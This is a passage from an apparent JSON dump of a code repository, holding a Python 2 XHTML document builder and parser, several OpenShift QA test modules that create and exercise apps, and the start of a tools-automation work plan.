\"select\", \"textarea\", \"label\", \"button\"]\nINLINE = [\"a\"] + INLINE_SPECIAL + INLINE_FONTSTYLE + INLINE_PHRASE + INLINE_FORM \n\ndef get_dtd_module(doctype):\n\tmodname = \"xhtml1_%s\" % (doctype)\n\tfullname = \"dtds.%s\" % (modname)\n\ttry:\n\t\treturn sys.modules[fullname]\n\texcept KeyError:\n\t\tpass\n\tpkg = __import__(fullname)\n\tmod = getattr(pkg, modname)\n\tsys.modules[fullname] = mod\n\tsetattr(sys.modules[__name__], modname, mod)\n\treturn mod\n\n# make strings into Text objects, otherwise verify Element object.\ndef check_object(obj):\n\tif type(obj) in (str, unicode):\n\t\treturn POM.Text(obj)\n\tif isinstance(obj, POM.ElementNode):\n\t\treturn obj\n\traise ValidationError, \"bad initializer object: should be string or ElementNode instance.\"\n\nclass XHTMLCOMMENT(POM.Comment):\n\tpass\n\nclass XHTMLElement(POM.ElementNode):\n\tpass\n\nclass XHTMLDocument(POM.POMDocument):\n\t\"\"\"XHTMLDocument(doctype)\n\tdoctype must be one of: STRICT, TRANSITIONAL, or FRAMESET.\n\t\"\"\"\n\tdef __init__(self, doctype=None, lang=\"en\", encoding=None):\n\t\tsuper(XHTMLDocument, self).__init__(encoding=encoding)\n\t\tself.lang = lang\n\t\tif doctype: # implies new document \n\t\t\tself.set_doctype(doctype)\n\t\t\tself.root = self.dtd.Html()\n\t\t\tself.root.set_namespace(None) # XHTML tags have no namespace\t\n\t\t\tself.head = self.root.add(self.dtd.Head)\n\t\t\tself.body = self.root.add(self.dtd.Body)\n\t\n\t# helpers for adding specific elements\n\tdef _set_title(self, title):\n\t\tti = self.head.add(self.dtd.Title)\n\t\tti.append(POM.Text(title))\n\tdef _get_title(self):\n\t\treturn self.getnode(\"/html/head/title\")\n\ttitle = property(_get_title, _set_title)\n\n\tdef _set_stylesheet(self, url):\n\t\tself.head.add(self.dtd.Link, rel=\"stylesheet\", type=\"text/css\", href=url)\n\tdef _get_stylesheet(self):\n\t\treturn self.getnode(\"/html/head/link\")\n\tstylesheet = property(_get_stylesheet, _set_stylesheet)\n\n\tdef set_root(self, rootnode):\n\t\tself.root = rootnode\n\t\tself.root.xmlns = NAMESPACE\n\t\tself.root.set_namespace(None)\n\t\tself.head = self.root[\"head\"]\n\t\tself.body = self.root[\"body\"]\n\n\tdef set_doctype(self, doctype):\n\t\tself.DOCTYPE = DOCTYPES[doctype]\n\t\tself.dtd = get_dtd_module(doctype)\n\t\tself.add_dtd(self.dtd)\n\n\tdef get_parser(self):\n\t\treturn XHTMLParser(self)\n\t\n\t# general add methods\n\tdef add_to_head(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = getattr(self.dtd, obj)\n\t\treturn apply(self.head.add, (obj,), kwargs)\n\t\n\tdef add(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = getattr(self.dtd, obj)\n\t\treturn self.body.add(obj, **kwargs)\n\n\tdef append(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = self.get_element(obj, **kwargs)\n\t\tself.body.append(obj)\n\t\n\tdef insert(self, ind, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = self.get_element(obj, **kwargs)\n\t\tself.body.insert(ind, obj)\n\n\t# generic element factory\n\tdef get_element(self, name, **kwargs):\n\t\tcl = getattr(self.dtd, name)\n\t\tinst = apply(cl, (), kwargs)\n\t\tinst.set_namespace(None)\n\t\treturn inst\n\n\tdef __setitem__(self, ind, obj):\n\t\tself.body[ind] = obj\n\tdef __getitem__(self, ind):\n\t\treturn self.body[ind]\n\tdef __delitem__(self, ind):\n\t\tdel self.body[ind]\n\n\tdef get_para(self, **attribs):\n\t\tPara = newclass(\"Para\", ParaMixin, self.dtd.P)\n\t\tp = Para(**attribs)\n\t\tp._init(self.dtd)\n\t\treturn p\n\n\tdef add_para(self, text, **attribs):\n\t\tp = self.get_para(**attribs)\n\t\tt = check_object(text)\n\t\tp.append(t)\n\t\tself.append(p)\n\t\treturn p\n\t\n\tdef add_header(self, level, text):\n\t\thobj = self.get_element(\"H%d\" % (level))\n\t\thobj.append(POM.Text(text))\n\t\tself.body.append(hobj)\n\n\tdef get_unordered_list(self, **attribs):\n\t\tUnordered = newclass(\"Unordered\", ListMixin, self.dtd.Ul)\n\t\tul = Unordered(**attribs)\n\t\tul._init(self.dtd)\n\t\treturn ul\n\n\tdef add_unordered_list(self, items):\n\t\tul = self.dtd.Ul()\n\t\tfor item in items:\n\t\t\tli = ul.add(self.dtd.Li)\n\t\t\tli.append(check_object(item))\n\t\tself.body.append(ul)\n\t\treturn ul\n\t\n\tdef add_ordered_list(self, items):\n\t\tol = self.dtd.Ol()\n\t\tfor item in items:\n\t\t\tli = ol.add(self.dtd.Li)\n\t\t\tli.append(check_object(item))\n\t\treturn ol\n\n\tdef add_anchor(self, obj=\"\", **attribs):\n\t\tA = apply(self.dtd.A, (), attribs)\n\t\tself.body.append(A)\n\t\tif type(obj) is str:\n\t\t\tA.append(POM.Text(obj))\n\t\telse:\n\t\t\tA.append(obj)\n\t\treturn A\n\n\tdef add_comment(self, text):\n\t\tcomment = XHTMLCOMMENT(text)\n\t\tself.body.append(comment)\n\n\tdef add_division(self, **attribs):\n\t\tdiv = self.dtd.Div(**attribs)\n\t\tself.body.append(div)\n\t\treturn div\n\t\n\tdef get_table(self, **kwargs):\n\t\tXHTMLTable = newclass(\"XHTMLTable\", TableMixin, self.dtd.Table)\n\t\tt= XHTMLTable(**kwargs)\n\t\tt._init(self.dtd)\n\t\treturn t\n\n\tdef add_table(self, **kwargs):\n\t\tt = self.get_table(**kwargs)\n\t\tself.append(t)\n\t\treturn t\n\n\tdef get_form(self, **kwargs):\n\t\tXHTMLForm = newclass(\"XHTMLForm\", FormMixin, self.dtd.Form)\n\t\t# instance of new class, with mixin\n\t\tf = XHTMLForm(**kwargs)\n\t\tf._init(self.dtd)\n\t\t#f.enctype=\"application/x-www-form-urlencoded\"\n\t\tf.enctype=\"multipart/form-data\"\n\t\treturn f\n\n\tdef add_form(self, **kwargs):\n\t\tf = self.get_form(**kwargs)\n\t\tself.append(f)\n\t\treturn f\n\n\tdef get_area(self, **kwargs):\n\t\tArea = newclass(\"Area\", DivMixin, self.dtd.Div)\n\t\tarea = Area(**kwargs)\n\t\tarea._init(self.dtd)\n\t\treturn area\n\n\tdef add_area(self, **kwargs):\n\t\tar = self.get_area(**kwargs)\n\t\tself.append(ar)\n\t\treturn ar\n\n\n# container for inline markup\nclass InlineMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\n\tdef inline(self, name, obj, **attribs):\n\t\tobj = check_object(obj)\n\t\tilmc = getattr(self.dtd, name)\n\t\tInline = newclass(\"Inline\", ilmc, InlineMixin)\n\t\til = Inline(**attribs)\n\t\til.append(obj)\n\t\tself.append(il)\n\t\treturn il\n\n\tdef text(self, text):\n\t\treturn self.add_text(\" \"+str(text))\n\n\tdef bold(self, obj, **attribs):\n\t\treturn self.inline(\"B\", obj, **attribs)\n\n\tdef italic(self, obj, **attribs):\n\t\treturn self.inline(\"I\", obj, **attribs)\n\n\tdef teletype(self, obj, **attribs):\n\t\treturn self.inline(\"Tt\", obj, **attribs)\n\n\tdef big(self, obj, **attribs):\n\t\treturn self.inline(\"Big\", obj, **attribs)\n\n\tdef small(self, obj, **attribs):\n\t\treturn self.inline(\"Small\", obj, **attribs)\n\n\tdef em(self, obj, **attribs):\n\t\treturn self.inline(\"Em\", obj, **attribs)\n\n\tdef strong(self, obj, **attribs):\n\t\treturn self.inline(\"Strong\", obj, **attribs)\n\n\tdef dfn(self, obj, **attribs):\n\t\treturn self.inline(\"Dfn\", obj, **attribs)\n\n\tdef code(self, obj, **attribs):\n\t\treturn self.inline(\"Code\", obj, **attribs)\n\n\tdef quote(self, obj, **attribs):\n\t\treturn self.inline(\"Q\", obj, **attribs)\n\tQ = quote\n\n\tdef sub(self, obj, **attribs):\n\t\treturn self.inline(\"Sub\", obj, **attribs)\n\n\tdef sup(self, obj, **attribs):\n\t\treturn self.inline(\"Sup\", obj, **attribs)\n\n\tdef samp(self, obj, **attribs):\n\t\treturn self.inline(\"Samp\", obj, **attribs)\n\n\tdef kbd(self, obj, **attribs):\n\t\treturn self.inline(\"Kbd\", obj, **attribs)\n\n\tdef var(self, obj, **attribs):\n\t\treturn self.inline(\"Var\", obj, **attribs)\n\n\tdef cite(self, obj, **attribs):\n\t\treturn self.inline(\"Cite\", obj, **attribs)\n\n\tdef abbr(self, obj, **attribs):\n\t\treturn self.inline(\"Abbr\", obj, **attribs)\n\n\tdef acronym(self, obj, **attribs):\n\t\treturn self.inline(\"Acronym\", obj, **attribs)\n\n\nParaMixin = InlineMixin\n\nclass ListMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\tdef add_item(self, obj, **attribs):\n\t\tobj = check_object(obj)\n\t\tilmc = getattr(self.dtd, \"Li\")\n\t\tItem = newclass(\"Item\", ilmc, InlineMixin)\n\t\til = Item(**attribs)\n\t\til.append(obj)\n\t\tself.append(il)\n\t\treturn il\n\n\n# Special support methods for XHTML tables. The makes it easy to produce simple\n# tables. easier to produce more complex tables. But it currently does not\n# support advanced table features. It allows setting cells by row and column\n# index (using a sparse table). The special emit method constructs the row\n# structure on the fly.\nclass TableMixin(object):\n\t# set document dtd so methods can access it to create sub-elements\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\t\tself._t_caption = None # only one\n\t\tself._headings = None\n\t\tself._t_rows = []\n\n\tdef caption(self, content, **kwargs):\n\t\t# enforce the rule that there is only one caption, and it is first\n\t\t# element in the table.\n\t\tcap = self.dtd.Caption(**kwargs)\n\t\tcap.append(check_object(content))\n\t\tself._t_caption = cap\n\n\tdef get_headings(self):\n\t\treturn self._headings # a row (tr) object.\n\n\tdef set_heading(self, col, val):\n\t\t\"\"\"Set heading at column <col> (origin 1) to <val>.\"\"\"\n\t\tval = check_object(val)\n\t\tif not self._headings:\n\t\t\tself._headings = self.dtd.Tr()\n\t\t# auto-fill intermediate cells, if necessary.\n\t\tfor inter in range(col - len(self._headings)):\n\t\t\tself._headings.append(self.dtd.Th())\n\t\tth = self._headings[col-1]\n\t\tth.append(val)\n\t\treturn th # so you can set attributes...\n\n\tdef set(self, col, row, val):\n\t\tval = check_object(val)\n\t\tfor inter in range(row - len(self._t_rows)):\n\t\t\tself._t_rows.append( self.dtd.Tr())\n\t\tr = self._t_rows[row-1]\n\t\tfor inter in range(col - len(r)):\n\t\t\tr.append( self.dtd.Td())\n\t\ttd = r[col-1]\n\t\ttd.append(val)\n\t\treturn td\n\n\tdef get(self, col, row):\n\t\tr = self._t_rows[row-1]\n\t\treturn r[col-1]\n\n\tdef delete(self, col, row):\n\t\tr = self._t_rows[row-1]\n\t\tdel r[col-1]\n\t\tif len(r) == 0:\n\t\t\tdel self._t_rows[row-1]\n\n\tdef emit(self, fo):\n\t\tself._verify_attributes()\n\t\tfo.write(\"<%s%s%s>\" % (self._get_ns(), self._name, self._attr_str()))\n\t\tif self._t_caption:\n\t\t\tself._t_caption.emit(fo)\n\t\tif self._headings:\n\t\t\tself._headings.emit(fo)\n\t\tfor row in self._t_rows:\n\t\t\trow.emit(fo)\n\t\tfo.write(\"</%s%s>\" % (self._get_ns(), self._name))\n\n\nclass FormMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\t\n\tdef get_textarea(self, text, name=None, rows=4, cols=60):\n\t\ttext = check_object(text)\n\t\ttextclass = newclass(\"TextWidget\", TextareaMixin, self.dtd.Textarea)\n\t\tta = textclass(name=name, rows=rows, cols=cols)\n\t\tta.append(text)\n\t\treturn ta\n\n\tdef add_textarea(self, text, name=None, rows=4, cols=60):\n\t\tta = self.get_textarea(text, name, rows, cols)\n\t\tself.append(ta)\n\t\treturn ta\n\t\n\tdef get_input(self, **kwargs):\n\t\tinputclass = newclass(\"InputWidget\", InputMixin, self.dtd.Input)\n\t\tinp = inputclass(**kwargs)\n\t\treturn inp\n\t\n\tdef add_input(self, **kwargs):\n\t\tinp = self.get_input(**kwargs)\n\t\tself.append(inp)\n\t\treturn inp\n\n\tdef add_textinput(self, name, label=None, size=30, default=None, maxlength=None):\n\t\tif label:\n\t\t\tlbl = self.dtd.Label()\n\t\t\tsetattr(lbl, \"for\", name) # 'for' is a keyword...\n\t\t\tlbl.append(check_object(label))\n\t\t\tself.append(lbl)\n\t\tself.append(self.dtd.Input(type=\"text\", name=name, value=default, \n\t\t\t\tmaxlength=maxlength))\n\n\tdef get_select(self, items, **kwargs):\n\t\tsl = self.dtd.Select(**kwargs)\n\t\tfor item in items:\n\t\t\topt = self.dtd.Option()\n\t\t\topt.append(POM.Text(str(item)))\n\t\t\tsl.append(opt)\n\t\treturn sl\n\n\tdef add_select(self, items, **kwargs):\n\t\tsl = self.get_select( items, **kwargs)\n\t\tself.append(sl)\n\t\treturn sl\n\n\tdef add_radiobuttons(self, name, items, vertical=False):\n\t\tfor i, item in enumerate(items):\n\t\t\tself.append(self.dtd.Input(type=\"radio\", name=name, value=i))\n\t\t\tself.append(check_object(item))\n\t\t\tif i == 0:\n\t\t\t\tself[-2].checked = TRUE # default to first one checked\n\t\t\tif vertical:\n\t\t\t\tself.append(self.dtd.Br())\n\n\tdef add_checkboxes(self, name, items, vertical=False):\n\t\tfor i, item in enumerate(items):\n\t\t\tself.append(self.dtd.Input(type=\"checkbox\", name=name, value=i))\n\t\t\tself.append(check_object(item))\n\t\t\tif vertical:\n\t\t\t\tself.append(self.dtd.Br())\n\n\tdef add_fileinput(self, name=\"fileinput\", default=None):\n\t\tself.append(self.dtd.Input(type=\"file\", name=name, value=default))\n\n\nclass WidgetBase(object):\n\tpass\n\nclass StringWidget(WidgetBase):\n\tpass\n\nclass PasswordWidget(StringWidget):\n\tpass\n\nclass TextareaMixin(WidgetBase):\n\tpass\n\nclass InputMixin(WidgetBase):\n\t\"\"\"type = (text | password | checkbox | radio | submit | reset |\n file | hidden | image | button) \"\"\"\n\tpass\n\n# container for other objects (Div) for layout purposes\n# Use CSS to define the area properties.\nclass DivMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\n\n# XHTML POM parser. This parser populates the POM with XHTML objects, so this\n# HTML parser essentially translates HTML to XHTML, hopefully with good\n# results.\nclass XHTMLParser(HTMLParser.HTMLParser):\n\tdef __init__(self, doc):\n\t\tself.reset()\n\t\tself.topelement = None\n\t\tself.doc=doc\n\t\tself.stack = []\n\n\tdef close(self):\n\t\tif self.stack:\n\t\t\traise POM.ValidationError, \"XHTML document has unmatched tags\"\n\t\tHTMLParser.HTMLParser.close(self)\n\t\tself.doc.set_root(self.topelement)\n\n\tdef parse(self, url):\n\t\timport urllib\n\t\tfo = urllib.urlopen(url)\n\t\tself.parseFile(fo)\n\t\tself.close()\n\t\t\n\tdef parseFile(self, fo):\n\t\tdata = fo.read(16384)\n\t\twhile data:\n\t\t\tself.feed(data)\n\t\t\tdata = fo.read(16384)\n\t\tself.close()\n\n\tdef _get_tag_obj(self, tag, attrs):\n\t\tattrdict = {}\n\t\tdef fixatts(t):\n\t\t\tattrdict[t[0]] = t[1]\n\t\tmap(fixatts, attrs)\n\t\tcl = getattr(self.doc.dtd, identifier(tag))\n\t\tcl.__bases__ = (XHTMLElement,) # XXX quck hack\n\t\tobj = apply(cl, (), attrdict)\n\t\treturn obj\n\n\tdef handle_starttag(self, tag, attrs):\n\t\tobj = self._get_tag_obj(tag, attrs)\n\t\tif obj.CONTENTMODEL.is_empty():\n\t\t\tself.stack[-1].append(obj)\n\t\t\treturn\n\t\tif not self.stack:\n\t\t\tobj.set_namespace(None)\n\t\tself.stack.append(obj)\n\n\tdef handle_endtag(self, tag):\n\t\t\"Handle an event for the end of a tag.\"\n\t\tobj = self.stack.pop()\n\t\tif self.stack:\n\t\t\tself.stack[-1].append(obj)\n\t\telse:\n\t\t\tself.topelement = obj\n\t\n\tdef handle_startendtag(self, tag, attrs):\n\t\tobj = self._get_tag_obj(tag, attrs)\n\t\tself.stack[-1].append(obj)\n\t\t\n\tdef handle_data(self, data):\n\t\tif self.stack:\n\t\t\tself.stack[-1].add_text(data)\n\t\telse:\n\t\t\t#print >>sys.stderr, \"XHTMLParser: kruft warning: %s: %r\" % (self.getpos(), data,)\n\t\t\tpass\n\t\n\tdef handle_charref(self, name):\n\t\tprint >>sys.stderr, \"!!! unhandled charref:\", repr(name)\n\t\n\tdef handle_entityref(self, name):\n\t\tif self.stack:\n\t\t\tself.stack[-1].add_text(entitydefs[name])\n\n\tdef handle_comment(self, data):\n\t\tself.stack[-1].append(POM.Comment(data))\n\n\tdef handle_decl(self, decl):\n\t\tif decl.startswith(\"DOCTYPE\"):\n\t\t\tif decl.find(\"Strict\") > 1:\n\t\t\t\tself.doc.set_doctype(STRICT)\n\t\t\telif decl.find(\"Frameset\") > 1:\n\t\t\t\tself.doc.set_doctype(FRAMESET)\n\t\t\telif decl.find(\"Transitional\") > 1:\n\t\t\t\tself.doc.set_doctype(TRANSITIONAL)\n\t\t\telse:\n\t\t\t\traise POM.ValidationError, \"unknown DOCTYPE: %r\" % (decl,)\n\t\telse:\n\t\t\tprint >>sys.stderr, \"!!! Unhandled decl: %r\" % (decl,)\n\n\tdef handle_pi(self, data):\n\t\t'xml version=\"1.0\" encoding=\"ISO-8859-1\"?'\n\t\tmo = re.match('xml version=\"([0123456789.]+)\" encoding=\"([A-Z0-9-]+)\"', data, re.IGNORECASE)\n\t\tif mo:\n\t\t\tversion, encoding = mo.groups()\n\t\t\tassert version == \"1.0\"\n\t\t\tself.doc.set_encoding(encoding)\n\t\telse:\n\t\t\tprint >>sys.stderr, \"!!! Unhandled pi: %r\" % (data,)\n\n\ndef new_document(doctype):\n\tdoc = XHTMLDocument(doctype)\n\treturn doc\n\ndef get_document(url):\n\tdoc = XHTMLDocument()\n\tp = doc.get_parser()\n\tp.parse(url)\n\treturn doc\n\n\nif __name__ == \"__main__\":\n\timport os\n\tos.system(\"qaunittest xhtml\")\n\n" }, { "alpha_fraction": 0.618573784828186, "alphanum_fraction": 0.6202321648597717, "avg_line_length": 22.647058486938477, "blob_id": "d996eb3658f1acbf1417b9bded9684c4dac86334", "content_id": "f353ac4f94d811bd8276ba1b071dd1708fbb9601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "no_license", "max_line_length": 90, "num_lines": 51, "path": "/automation/open/testmodules/Collections/RunTests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport tcms_base\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\nclass RunTests(OpenShiftTest):\n def test_method(self):\n return self.passed(\"test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n if conf.options.TCMS:\n tests = conf.tcms_obj.get_testscripts_by_tag(conf.tcms_tag)\n else:\n # user specified the tag file from a json file\n tests = rhtest.extract_tests_from_json_file(conf.options.json_file)\n #tests, variant_map = rhtest.extract_tests_from_json_file(conf.options.json_file)\n #conf['testcase_variants_map'] = variant_map\n suite.add_test(RunTests)\n i = 0\n for test, args in tests:\n i += 1\n try:\n klass = rhtest.convert_script_to_cls(test)\n print \"KLASS: %s\" % klass\n suite.add_test(klass, args)\n except:\n print \"Failed to import test '%s'\" % test\n pass\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5576726794242859, "alphanum_fraction": 0.5702620148658752, "avg_line_length": 27.8137264251709, "blob_id": "a1dacfb46449fc7c26da04afe3d1be1a0df915f2", "content_id": "a591f3b2d3554ecb483803b4db4500e581ad1997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2939, "license_type": "no_license", "max_line_length": 129, "num_lines": 102, "path": "/automation/open/testmodules/RT/limits/mod_bw.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_size = 2048\n self.bw_limit = 500000\n tcms_testcase_id=122197\n\n \tcommon.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.destroy_app(self.app_name)\n os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass ModBw(OpenShiftTest):\n def check_bandwidth(self, bandwidth):\n print \"The download speed is: %s\" % bandwidth\n if float(bandwidth) < self.bw_limit:\n return 0\n return 1\n\n def test_method(self):\n #1\n step = testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #2\n step = testcase.TestCaseStep(\n \"generate a %dK size file\"% self.file_size,\n \"dd if=/dev/zero bs=1K count=%d of=%s/php/tmp.html\"% (self.file_size, self.app_name),\n expect_return = 0)\n self.steps_list.append(step)\n\n #3\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n self.steps_list.append(step)\n\n #4\n step = testcase.TestCaseStep(\n \"get app URL\",\n common.get_app_url_from_user_info,\n function_parameters = [self.app_name])\n self.steps_list.append(step)\n\n #5\n step = testcase.TestCaseStep(\n \"check feedback\",\n \"curl --fail --silent --max-time 300 -o /dev/null -w %{speed_download} -H 'Pragma: no-cache' __OUTPUT__[4]/tmp.html\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #6\n step = testcase.TestCaseStep(\n \"check the bandwidth\",\n self.check_bandwidth,\n function_parameters = ['__OUTPUT__[5]'],\n expect_return = 0)\n \n\n case = testcase.TestCase(\"[rhc-limits] apache bandwidth limit\", self.steps_list)\n case.run()\n\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ModBw)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5810493230819702, "alphanum_fraction": 0.5916209816932678, "avg_line_length": 32.155845642089844, "blob_id": "98f5fc007a8f4869a8aa228810f2c4897ebb468f", "content_id": "241713c5dbaa36a5fb29b5b97c1a08ad5a22fe31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2554, "license_type": "no_license", "max_line_length": 132, "num_lines": 77, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_ruby.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1343][Runtime][cartridge] Create local lib mirrors for Ruby framework\nhttps://tcms.engineering.redhat.com/case/121925/\n\"\"\"\nimport os,sys,re\n\nimport testcase, common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1343][Runtime][cartridge] Create local lib mirrors for Ruby framework\"\n self.app = { 'name':'rubytest', 'type':common.app_types['ruby'] }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n\nclass LocalLibMirrorsRuby(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create new rails app\",\n \"rails new %s -f\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create new rails app, and bundle check\",\n \"cd %s && sed -i 's,rubygems.org,mirror1.prod.rhcloud.com/mirror/ruby,' Gemfile && bundle check\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Installing rack', 'Fetching source index for http.*ruby'],\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsRuby)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5664030313491821, "alphanum_fraction": 0.5699481964111328, "avg_line_length": 34.25, "blob_id": "ce81c29734e9766180ebf427cb93dda55d5ad17a", "content_id": "82bb4f51be9add97c2c3ebeddf6ea42389e588fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3667, "license_type": "no_license", "max_line_length": 167, "num_lines": 104, "path": "/automation/open/testmodules/RT/node/pick_gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\n\n[US1373][UI][CLI] Pick gear size\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [ \"DEV\" ]\n def initialize(self):\n self.summary = \"[US1373][UI][CLI] Pick gear size\"\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'jbossas'\n self.app_name = \"my%s%s\" % ( self.app_type, common.getRandomString() )\n self.steps_list = []\n\n common.env_setup()\n if self.get_run_mode() == \"DEV\":\n common.add_gearsize_capability('medium')\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n if self.get_run_mode() == \"DEV\":\n common.remove_gearsize_capability('medium')\n \nclass PickGearSize(OpenShiftTest):\n #\n # With current framework it's almost impossible to implement\n #\n # In order to create medium / large gear-sized application \n # I need a devenv instance with medium / large profile\n #\n # Waiting for the final implementation of the new framework\n #\n #for gear_size in [ 'small', 'medium', 'large' ]:\n # # Creating the application\n # steps.append(testcase.TestCaseStep(\n # \"Creating application with gear size '%s'\" % ( gear_size ),\n # \"rhc app create -a %s -t %s -g %s -l %s -p %s -n\" % ( self.app_name, common.self.app_types[self.app_type], gear_size, self.user_email, self.user_passwd ),\n # expect_description = \"The application must be created successfully with the given gear size\",\n # expect_return = 0 \n # ))\n #\n # \n # # Destroying the application\n # steps.append(testcase.TestCaseStep(\n # \"Destroying the application with gear size '%s'\" % ( gear_size ),\n # \"rhc app destroy -a %s -b -l %s -p %s\" % ( self.app_name, self.user_email, self.user_passwd ),\n # expect_description = \"The application must be destroyed successfully\",\n # expect_return = 0 \n # ))\n \n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating application with a not supported gear size\",\n \"rhc app create %s %s -g %s -l %s -p %s --no-git %s\" \n % (self.app_name, \n common.app_types[self.app_type],\n common.get_domain_name(), self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The application must be not created\",\n expect_return = \"!0\"))\n \n case = testcase.TestCase(\n self.summary, \n self.steps_list,\n clean_up_function_parameters = [ self.config.OPENSHIFT_user_email, False ]) # Reverting to False to not bother other test-cases)\n\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PickGearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.664814829826355, "alphanum_fraction": 0.6870370507240295, "avg_line_length": 25.950000762939453, "blob_id": "c214138b4be696bbf78049ab408513786049a1ea", "content_id": "2730827ae46092e13dee184fca5bcbb8c651952c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 540, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/automation/auto_plan_201306.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Tools Automation Work Plan\n===========================\n\n\n* Framework 2~3 weeks\n - improve and complete the framework.\n - draft tools automation convensions and rules. \n - move the git repo to code.engineering.redhat.com\n\n* Example & Talking 1~2 weeks\n - write a demo or some typical examples.\n - give a tech talk about tools automation.\n\n* Beaker Automation 7~11 weeks\n - write library, keywords, resources. 1~2 weeks\n - write high-level cases. 5~8 weeks\n - integrete test all automated cases. 1 